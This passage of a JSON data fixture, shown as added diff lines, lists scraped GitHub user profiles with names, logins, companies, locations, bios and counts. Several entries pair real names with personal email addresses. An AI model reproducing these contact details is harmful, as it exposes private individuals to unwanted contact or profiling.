"xl-sec", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31486311?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 5, + "public_gists_count": 2, + "public_repositories_count": 11, + "created_at": "2017-08-30T18:02:06Z", + "updated_at": "2024-08-30T06:51:12Z", + "node_id": "MDQ6VXNlcjMxNDg2MzEx", + "bio": "Various security related projects", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 543, + "fields": { + "nest_created_at": "2024-09-11T21:28:23.752Z", + "nest_updated_at": "2024-09-11T21:28:23.752Z", + "name": "eV", + "login": "electron-volt", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8611427?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2014-09-01T06:20:36Z", + "updated_at": "2023-07-21T09:04:54Z", + "node_id": "MDQ6VXNlcjg2MTE0Mjc=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 544, + "fields": { + "nest_created_at": "2024-09-11T21:28:24.994Z", + "nest_updated_at": "2024-09-11T21:28:24.994Z", + "name": "Charles Low", + "login": "hkcharles", + "email": "hk.charles@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5180085?v=4", + "company": "", + "location": "Hong Kong", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2013-08-07T07:06:53Z", + "updated_at": "2020-12-04T05:56:39Z", + "node_id": "MDQ6VXNlcjUxODAwODU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 545, + "fields": { + "nest_created_at": "2024-09-11T21:28:27.136Z", + "nest_updated_at": "2024-09-22T20:24:35.121Z", + "name": "Mert Karatas", + "login": "mmkaratas", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3624713?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2013-02-18T09:21:34Z", + "updated_at": "2024-01-16T23:44:43Z", + "node_id": "MDQ6VXNlcjM2MjQ3MTM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 546, + "fields": { + "nest_created_at": "2024-09-11T21:28:28.431Z", + "nest_updated_at": "2024-09-22T20:24:53.161Z", + "name": "Pouya", + "login": "Pouya47", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17422265?v=4", + "company": "@amnban", + "location": "Internet", + "collaborators_count": 0, + "following_count": 17, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2016-02-23T04:28:11Z", + "updated_at": "2023-06-23T13:56:18Z", + "node_id": "MDQ6VXNlcjE3NDIyMjY1", + "bio": "Security Researcher", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 547, + "fields": { + "nest_created_at": "2024-09-11T21:28:29.649Z", + "nest_updated_at": "2024-09-11T21:28:29.649Z", + "name": "", + "login": "SyCode7", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6909640?v=4", + "company": "@mitigant ", + "location": "", + "collaborators_count": 0, + "following_count": 103, + "followers_count": 26, + "public_gists_count": 7, + "public_repositories_count": 104, + "created_at": "2014-03-10T16:44:07Z", + "updated_at": "2024-09-10T07:48:41Z", + "node_id": "MDQ6VXNlcjY5MDk2NDA=", + "bio": ".... raging towards my destiny 👍 ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 548, + "fields": { + "nest_created_at": "2024-09-11T21:28:30.461Z", + "nest_updated_at": "2024-09-11T21:28:30.461Z", + "name": "", + "login": "anybodynobody", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/41279309?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-07-16T04:57:20Z", + "updated_at": "2018-11-13T05:53:39Z", + "node_id": "MDQ6VXNlcjQxMjc5MzA5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 549, + "fields": { + "nest_created_at": "2024-09-11T21:28:32.621Z", + "nest_updated_at": "2024-09-11T21:28:32.621Z", + "name": "Luiz Augusto dos Santos Lohn", + "login": "luizlohn", + "email": "luiz.lohn@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/9451950?v=4", + "company": "Luiz Lohn ", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 13, + "public_gists_count": 0, + "public_repositories_count": 31, + "created_at": "2014-10-29T19:11:16Z", + "updated_at": "2023-08-21T22:02:49Z", + "node_id": "MDQ6VXNlcjk0NTE5NTA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 550, + "fields": { + "nest_created_at": "2024-09-11T21:28:33.982Z", + "nest_updated_at": "2024-09-22T20:24:26.745Z", + "name": "Jay", + "login": "JZDLin", + "email": "jayzudilin@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/34228884?v=4", + "company": "Positive Technologies", + "location": "Russia, Moscow", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2017-12-04T06:10:38Z", + "updated_at": "2022-04-21T00:56:22Z", + "node_id": "MDQ6VXNlcjM0MjI4ODg0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 551, + "fields": { + "nest_created_at": "2024-09-11T21:28:35.694Z", + "nest_updated_at": "2024-09-11T21:28:35.694Z", + "name": "", + "login": "fernandogalves", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4174325?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2013-04-16T19:20:45Z", + "updated_at": "2018-10-02T18:26:23Z", + "node_id": "MDQ6VXNlcjQxNzQzMjU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 552, + "fields": { + "nest_created_at": "2024-09-11T21:28:37.734Z", + "nest_updated_at": "2024-09-11T21:28:37.734Z", + "name": "", + "login": "miguelsuddya", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2588495?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2012-10-18T10:45:30Z", + "updated_at": "2024-09-03T09:57:09Z", + "node_id": "MDQ6VXNlcjI1ODg0OTU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 553, + "fields": { + "nest_created_at": "2024-09-11T21:28:39.811Z", + "nest_updated_at": "2024-09-11T21:28:39.811Z", + "name": "Luke Briner", + "login": "lukos", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/581018?v=4", + "company": "SmartSurvey Ltd", + "location": "Stroud, UK", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 21, + "public_gists_count": 4, + "public_repositories_count": 23, + "created_at": "2011-01-24T15:55:49Z", + "updated_at": "2024-08-15T08:03:37Z", + "node_id": "MDQ6VXNlcjU4MTAxOA==", + "bio": "", + "is_hireable": false, + "twitter_username": "lukiebriner" + } +}, +{ + "model": "github.user", + "pk": 554, + "fields": { + "nest_created_at": "2024-09-11T21:28:40.764Z", + "nest_updated_at": "2024-09-11T21:28:40.764Z", + "name": "Till Lorentzen", + "login": "tilllorentzenbreuninger", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/29751495?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2017-06-28T10:05:14Z", + "updated_at": "2019-04-09T08:07:00Z", + "node_id": "MDQ6VXNlcjI5NzUxNDk1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 555, + "fields": { + "nest_created_at": "2024-09-11T21:28:41.595Z", + "nest_updated_at": "2024-09-11T21:28:41.595Z", + "name": "David Welsch", + "login": "Omphaloskepsis", + "email": "dw@cluemail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/48968776?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2019-03-26T22:25:05Z", + "updated_at": "2024-03-22T19:05:01Z", + "node_id": "MDQ6VXNlcjQ4OTY4Nzc2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 556, + "fields": { + "nest_created_at": "2024-09-11T21:28:42.449Z", + "nest_updated_at": "2024-09-11T21:28:42.449Z", + "name": "", + "login": "Sisim", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/14979786?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2015-10-05T14:19:24Z", + "updated_at": "2020-02-04T08:39:59Z", + "node_id": "MDQ6VXNlcjE0OTc5Nzg2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 557, + "fields": { + "nest_created_at": "2024-09-11T21:28:43.316Z", + "nest_updated_at": "2024-09-11T21:28:43.316Z", + "name": "", + "login": "phetdavan1", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/40703040?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2018-06-29T20:19:26Z", + "updated_at": "2024-08-26T11:48:21Z", + "node_id": "MDQ6VXNlcjQwNzAzMDQw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 558, + "fields": { + "nest_created_at": "2024-09-11T21:28:44.164Z", + "nest_updated_at": "2024-09-11T21:28:44.164Z", + "name": "Eldar Marcussen", + "login": "wireghoul", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/92534?v=4", + "company": "", + "location": "Melbourne, Australia", + "collaborators_count": 0, + "following_count": 44, + "followers_count": 522, + "public_gists_count": 7, + "public_repositories_count": 62, + "created_at": "2009-06-06T10:12:44Z", + "updated_at": "2024-08-02T11:24:05Z", + "node_id": "MDQ6VXNlcjkyNTM0", + "bio": "www.justanotherhacker.com", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 559, + "fields": { + "nest_created_at": "2024-09-11T21:28:46.722Z", + "nest_updated_at": "2024-09-22T18:33:21.743Z", + "name": "spotlesscoder", + "login": "spotlesscoder", + "email": "codingspiderfox@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/25173078?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 17, + "public_gists_count": 16, + "public_repositories_count": 1049, + "created_at": "2017-01-17T10:32:42Z", + "updated_at": "2024-09-17T13:54:59Z", + "node_id": "MDQ6VXNlcjI1MTczMDc4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 560, + "fields": { + "nest_created_at": "2024-09-11T21:28:50.416Z", + "nest_updated_at": "2024-09-11T21:28:50.416Z", + "name": "", + "login": "sanba06c", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/50707540?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2019-05-16T13:53:30Z", + "updated_at": "2024-07-29T06:52:51Z", + "node_id": "MDQ6VXNlcjUwNzA3NTQw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 561, + "fields": { + "nest_created_at": "2024-09-11T21:28:51.273Z", + "nest_updated_at": "2024-09-11T21:28:51.273Z", + "name": "", + "login": "slekies", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7873521?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2014-06-12T18:31:30Z", + "updated_at": "2024-07-22T23:28:16Z", + "node_id": "MDQ6VXNlcjc4NzM1MjE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 562, + "fields": { + "nest_created_at": "2024-09-11T21:28:52.091Z", + "nest_updated_at": "2024-09-22T18:31:09.496Z", + "name": "Ulises Gascón", + "login": "UlisesGascon", + "email": "ulisesgascongonzalez@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5110813?v=4", + "company": "@nodesource", + "location": "Madrid", + "collaborators_count": 0, + "following_count": 646, + "followers_count": 1430, + "public_gists_count": 92, + "public_repositories_count": 207, + "created_at": "2013-07-29T06:55:12Z", + "updated_at": "2024-09-16T18:40:39Z", + "node_id": "MDQ6VXNlcjUxMTA4MTM=", + "bio": "FOSS Maintainer & Maker | Principal Engineer @onebeyond | @Docker Captain, MVP, GDE | ex: @google @IBM", + "is_hireable": true, + "twitter_username": "kom_256" + } +}, +{ + "model": "github.user", + "pk": 563, + "fields": { + "nest_created_at": "2024-09-11T21:29:01.250Z", + "nest_updated_at": "2024-09-22T18:22:27.762Z", + "name": "", + "login": "katyanton", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12159105?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2015-04-28T19:35:52Z", + "updated_at": "2024-04-03T20:20:21Z", + "node_id": "MDQ6VXNlcjEyMTU5MTA1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 564, + "fields": { + "nest_created_at": "2024-09-11T21:29:05.349Z", + "nest_updated_at": "2024-09-22T20:24:28.312Z", + "name": "Brian Glas", + "login": "infosecdad", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10943087?v=4", + "company": "Union University", + "location": "Jackson, TN", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 33, + "public_gists_count": 0, + "public_repositories_count": 30, + "created_at": "2015-02-10T15:07:35Z", + "updated_at": "2024-09-04T11:26:24Z", + "node_id": "MDQ6VXNlcjEwOTQzMDg3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 565, + "fields": { + "nest_created_at": "2024-09-11T21:29:06.630Z", + "nest_updated_at": "2024-09-22T20:29:33.589Z", + "name": "Philippe Arteau", + "login": "h3xstream", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/593130?v=4", + "company": "", + "location": "Montreal, Canada", + "collaborators_count": 0, + "following_count": 42, + "followers_count": 511, + "public_gists_count": 32, + "public_repositories_count": 102, + "created_at": "2011-01-31T17:06:50Z", + "updated_at": "2024-09-13T11:33:55Z", + "node_id": "MDQ6VXNlcjU5MzEzMA==", + "bio": "", + "is_hireable": false, + "twitter_username": "h3xstream" + } +}, +{ + "model": "github.user", + "pk": 566, + "fields": { + "nest_created_at": "2024-09-11T21:29:07.896Z", + "nest_updated_at": "2024-09-22T20:24:51.234Z", + "name": "Stefan Schmitt", + "login": "stschmitt", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20317763?v=4", + "company": "IBM", + "location": "Germany", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2016-07-06T10:04:41Z", + "updated_at": "2024-06-27T13:46:24Z", + "node_id": "MDQ6VXNlcjIwMzE3NzYz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 567, + "fields": { + "nest_created_at": "2024-09-11T21:29:09.554Z", + "nest_updated_at": "2024-09-22T18:48:29.510Z", + "name": "Michael Schlenker", + "login": "schlenk", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/979026?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 11, + "public_gists_count": 0, + "public_repositories_count": 26, + "created_at": "2011-08-14T09:36:16Z", + "updated_at": "2024-02-27T12:06:52Z", + "node_id": "MDQ6VXNlcjk3OTAyNg==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 568, + "fields": { + "nest_created_at": "2024-09-11T21:29:11.216Z", + "nest_updated_at": "2024-09-12T00:26:50.015Z", + "name": "daxin09", + "login": "daxin09pp", + "email": "412909409@qq.com", + "avatar_url": "https://avatars.githubusercontent.com/u/12574090?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2015-05-23T14:30:57Z", + "updated_at": "2024-08-06T01:28:28Z", + "node_id": "MDQ6VXNlcjEyNTc0MDkw", + "bio": "security developer, pen tester.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 569, + "fields": { + "nest_created_at": "2024-09-11T21:29:12.868Z", + "nest_updated_at": "2024-09-11T21:29:12.868Z", + "name": "", + "login": "Liortenne", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/87302631?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-07-12T08:14:30Z", + "updated_at": "2024-09-04T08:44:43Z", + "node_id": "MDQ6VXNlcjg3MzAyNjMx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 570, + "fields": { + "nest_created_at": "2024-09-11T21:29:13.714Z", + "nest_updated_at": "2024-09-22T20:24:46.096Z", + "name": "", + "login": "Laancelot", + "email": "laancelot@pm.me", + "avatar_url": "https://avatars.githubusercontent.com/u/1171697?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2011-11-04T07:20:32Z", + "updated_at": "2023-05-10T14:18:58Z", + "node_id": "MDQ6VXNlcjExNzE2OTc=", + "bio": "mobile developer in cybersecurity", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 571, + "fields": { + "nest_created_at": "2024-09-11T21:29:14.967Z", + "nest_updated_at": "2024-09-22T20:25:09.653Z", + "name": "Kamil Gierach-Pacanek", + "login": "KamilPacanek", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20944885?v=4", + "company": "Netcompany", + "location": "Poland", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 5, + "public_gists_count": 1, + "public_repositories_count": 18, + "created_at": "2016-08-10T08:40:33Z", + "updated_at": "2024-03-11T18:44:57Z", + "node_id": "MDQ6VXNlcjIwOTQ0ODg1", + "bio": "📌 Owner and publisher of @CyberEthicalMe \r\n🔒 Hacking for the Security Awareness", + "is_hireable": false, + "twitter_username": "KPacanek" + } +}, +{ + "model": "github.user", + "pk": 572, + "fields": { + "nest_created_at": "2024-09-11T21:29:16.224Z", + "nest_updated_at": "2024-09-22T20:29:06.942Z", + "name": "Gerardo Canedo", + "login": "gerardocanedo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/21037998?v=4", + "company": "", + "location": "Montevideo, Uruguay", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 10, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2016-08-15T12:37:22Z", + "updated_at": "2024-08-02T11:46:53Z", + "node_id": "MDQ6VXNlcjIxMDM3OTk4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 573, + "fields": { + "nest_created_at": "2024-09-11T21:29:17.453Z", + "nest_updated_at": "2024-09-22T20:30:11.319Z", + "name": "Hans Thorhauge Dam", + "login": "hanstdam", + "email": "hans.dam+github@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6084115?v=4", + "company": "Sonatype", + "location": "Mabou, Nova Scotia, Canada", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 8, + "public_gists_count": 3, + "public_repositories_count": 8, + "created_at": "2013-12-02T09:16:54Z", + "updated_at": "2024-04-27T19:45:44Z", + "node_id": "MDQ6VXNlcjYwODQxMTU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 574, + "fields": { + "nest_created_at": "2024-09-11T21:29:19.117Z", + "nest_updated_at": "2024-09-11T21:29:19.117Z", + "name": "Collin Monahan", + "login": "llaenowyd", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/41239783?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 18, + "followers_count": 8, + "public_gists_count": 20, + "public_repositories_count": 39, + "created_at": "2018-07-14T17:45:36Z", + "updated_at": "2024-07-25T19:07:10Z", + "node_id": "MDQ6VXNlcjQxMjM5Nzgz", + "bio": "Our ambition is to satisfy people’s need to be happy, through our software -- Satoru Iwata", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 575, + "fields": { + "nest_created_at": "2024-09-11T21:29:19.978Z", + "nest_updated_at": "2024-09-22T20:24:24.820Z", + "name": "Miguel Muñoz", + "login": "SwingGuy1024", + "email": "SwingGuy1024@yahoo.com", + "avatar_url": "https://avatars.githubusercontent.com/u/19262903?v=4", + "company": "neptunedreams.com", + "location": "NE Los Angeles, near South Pasadena", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 22, + "public_repositories_count": 28, + "created_at": "2016-05-09T08:50:48Z", + "updated_at": "2024-07-12T06:27:29Z", + "node_id": "MDQ6VXNlcjE5MjYyOTAz", + "bio": "Born in Detroit, I graduated from Harvey Mudd College with a B.S. in Physics, but quickly migrated to software development. I have worked with Java since 1996.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 576, + "fields": { + "nest_created_at": "2024-09-11T21:29:22.194Z", + "nest_updated_at": "2024-09-11T21:29:22.194Z", + "name": "OSINTfun", + "login": "brictonperezbarbsa", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/18238538?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2016-04-03T01:44:47Z", + "updated_at": "2024-01-31T01:16:11Z", + "node_id": "MDQ6VXNlcjE4MjM4NTM4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 577, + "fields": { + "nest_created_at": "2024-09-11T21:29:23.837Z", + "nest_updated_at": "2024-09-11T21:29:23.837Z", + "name": "", + "login": "JusTruetice", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/100226750?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2022-02-22T17:11:45Z", + "updated_at": "2024-08-31T15:41:51Z", + "node_id": "U_kgDOBflWvg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 578, + "fields": { + "nest_created_at": "2024-09-11T21:29:24.652Z", + "nest_updated_at": "2024-09-22T17:34:44.854Z", + "name": "", + "login": "TechWriteGirl", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/21085416?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2016-08-17T15:51:54Z", + "updated_at": "2024-08-13T13:34:21Z", + "node_id": "MDQ6VXNlcjIxMDg1NDE2", + "bio": "Application security, technical writing", + "is_hireable": false, + "twitter_username": "TechWriteGirl" + } +}, +{ + "model": "github.user", + "pk": 579, + "fields": { + "nest_created_at": "2024-09-11T21:29:26.347Z", + "nest_updated_at": "2024-09-11T21:29:26.347Z", + "name": "", + "login": "aeropagz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/51108342?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 39, + "created_at": "2019-05-28T05:30:38Z", + "updated_at": "2024-08-31T11:27:39Z", + "node_id": "MDQ6VXNlcjUxMTA4MzQy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 580, + "fields": { + "nest_created_at": "2024-09-11T21:29:27.183Z", + "nest_updated_at": "2024-09-11T21:29:27.183Z", + "name": "Enzo Davico", + "login": "envico801", + "email": "envico801@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/132226893?v=4", + "company": "Freelancer", + "location": "Buenos Aires, Argentina.", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 27, + "created_at": "2023-04-30T19:16:58Z", + "updated_at": "2024-09-05T18:07:03Z", + "node_id": "U_kgDOB-GfTQ", + "bio": "Aspiring programmer💻, diving deep into the wild world of code. Interested in Crypto and a Vim enthusiast.", + "is_hireable": false, + "twitter_username": "envico801" + } +}, +{ + "model": "github.user", + "pk": 581, + "fields": { + "nest_created_at": "2024-09-11T21:29:28.024Z", + "nest_updated_at": "2024-09-11T21:29:28.024Z", + "name": "Bijoy", + "login": "bjayach", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/67444235?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-06-25T22:59:03Z", + "updated_at": "2024-05-24T00:01:33Z", + "node_id": "MDQ6VXNlcjY3NDQ0MjM1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 582, + "fields": { + "nest_created_at": "2024-09-11T21:29:28.848Z", + "nest_updated_at": "2024-09-22T20:25:44.032Z", + "name": "Christian Heinrich", + "login": "cmlh", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/136826?v=4", + "company": "@Malform", + "location": "Adelaide, Australia", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 26, + "public_repositories_count": 228, + "created_at": "2009-10-08T13:27:01Z", + "updated_at": "2024-09-12T04:01:34Z", + "node_id": "MDQ6VXNlcjEzNjgyNg==", + "bio": "https://www.linkedin.com/in/ChristianHeinrich", + "is_hireable": true, + "twitter_username": "cmlh" + } +}, +{ + "model": "github.user", + "pk": 583, + "fields": { + "nest_created_at": "2024-09-11T21:29:29.663Z", + "nest_updated_at": "2024-09-11T21:29:29.663Z", + "name": "Marco Canducci", + "login": "candoz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9741596?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2014-11-14T09:42:39Z", + "updated_at": "2024-08-26T13:20:40Z", + "node_id": "MDQ6VXNlcjk3NDE1OTY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 584, + "fields": { + "nest_created_at": "2024-09-11T21:29:30.505Z", + "nest_updated_at": "2024-09-11T21:29:30.505Z", + "name": "", + "login": "drhankey", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/133871317?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-05-17T11:18:03Z", + "updated_at": "2024-01-25T21:50:52Z", + "node_id": "U_kgDOB_q21Q", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 585, + "fields": { + "nest_created_at": "2024-09-11T21:29:31.319Z", + "nest_updated_at": "2024-09-22T17:48:36.471Z", + "name": "Jasmin", + "login": "jasminmair", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5774072?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2013-10-25T12:12:35Z", + "updated_at": "2024-09-04T09:02:26Z", + "node_id": "MDQ6VXNlcjU3NzQwNzI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 586, + "fields": { + "nest_created_at": "2024-09-11T21:29:43.251Z", + "nest_updated_at": "2024-09-11T21:29:43.251Z", + "name": "jungletsubasa", + "login": "aoprea1982", + "email": "adrianconstantin.oprea@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/16059481?v=4", + "company": "", + "location": "inJungle", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2015-11-28T14:31:51Z", + "updated_at": "2024-04-30T11:44:05Z", + "node_id": "MDQ6VXNlcjE2MDU5NDgx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 587, + "fields": { + "nest_created_at": "2024-09-11T21:29:44.074Z", + "nest_updated_at": "2024-09-22T20:25:39.548Z", + "name": "yu fujioka", + "login": "fujiokayu", + "email": "", + "avatar_url": 